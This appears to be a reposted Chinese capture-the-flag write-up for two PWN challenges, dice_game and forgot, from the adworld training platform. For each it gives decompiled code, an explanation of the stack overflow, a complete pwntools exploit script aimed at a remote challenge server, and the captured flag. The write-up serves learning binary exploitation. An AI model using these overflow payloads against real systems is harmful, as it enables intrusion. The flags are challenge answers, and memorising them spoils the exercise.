3

攻防世界-高手区-PWN部分-WriteUP

 2 years ago
source link: https://iamywang.github.io/2020/adworld-pwn-2/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

0x01 dice_game

char buf[55]; // [rsp+0h] [rbp-50h]
char v5; // [rsp+37h] [rbp-19h]
ssize_t v6; // [rsp+38h] [rbp-18h]
unsigned int seed[2]; // [rsp+40h] [rbp-10h]
unsigned int v8; // [rsp+4Ch] [rbp-4h]

覆盖seed,让伪随机数变成确定的。
首先填充0x40个字符,然后加上p64(1)。

p = remote('220.249.52.133',54186)

payload = 'A' * 0x40 + p64(1)
p.sendlineafter('your name: ', payload)
a = '2 5 4 2 6 2 5 1 4 2 3 2 3 2 6 5 1 1 5 5 6 3 4 4 3 3 3 2 2 2 6 1 1 1 6 4 2 5 2 5 4 4 4 6 3 2 3 3 6 1'.split(' ')
print len(a)
for i in range(50):
    p.sendlineafter('point(1~6): ', a[i])
p.interactive()

拿到flag:cyberpeace{22068165d7b159caeea14a0985464246}

0x02 forgot

int sub_80486CC()
{
  char s; // [esp+1Eh] [ebp-3Ah]

snprintf(&s, 0x32u, "cat %s", "./flag");
  return system(&s);
}

需要构造溢出到这个函数,地址是0x080486CC

...
  char v2[32]; // [esp+10h] [ebp-74h]
  int (*v3)(); // [esp+30h] [ebp-54h]
  int (*v4)(); // [esp+34h] [ebp-50h]
  int (*v5)(); // [esp+38h] [ebp-4Ch]
  int (*v6)(); // [esp+3Ch] [ebp-48h]
  int (*v7)(); // [esp+40h] [ebp-44h]
  int (*v8)(); // [esp+44h] [ebp-40h]
  int (*v9)(); // [esp+48h] [ebp-3Ch]
  int (*v10)(); // [esp+4Ch] [ebp-38h]
  int (*v11)(); // [esp+50h] [ebp-34h]
  int (*v12)(); // [esp+54h] [ebp-30h]
  char s; // [esp+58h] [ebp-2Ch]
  int v14; // [esp+78h] [ebp-Ch]
  size_t i; // [esp+7Ch] [ebp-8h]
...
  (*(&v3 + --v14))();
...

注意main函数中这些变量的关系,需要构造溢出覆盖掉某个int变量为目标函数的地址。
后面要让v14相对v3的偏移量恰好指向那个变量。从而调用函数。
观察得到:只要输入字符a,那么v14最后的值为2。
这样:覆盖v4。

from pwn import *

p = remote('220.249.52.133', 44606)

payload = 'a' * 0x24 + p32(0x080486CC)
p.sendline('ttt')
p.sendlineafter('> ',payload)
p.interactive()

最后的情况:

v4 = 0x080486CC
v14 = 2
(*(&v3 + --v14))()指向的就是v3+1也就是v4的位置。

flag:cyberpeace{e6862a8733408cc383e336a39d611b47}


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK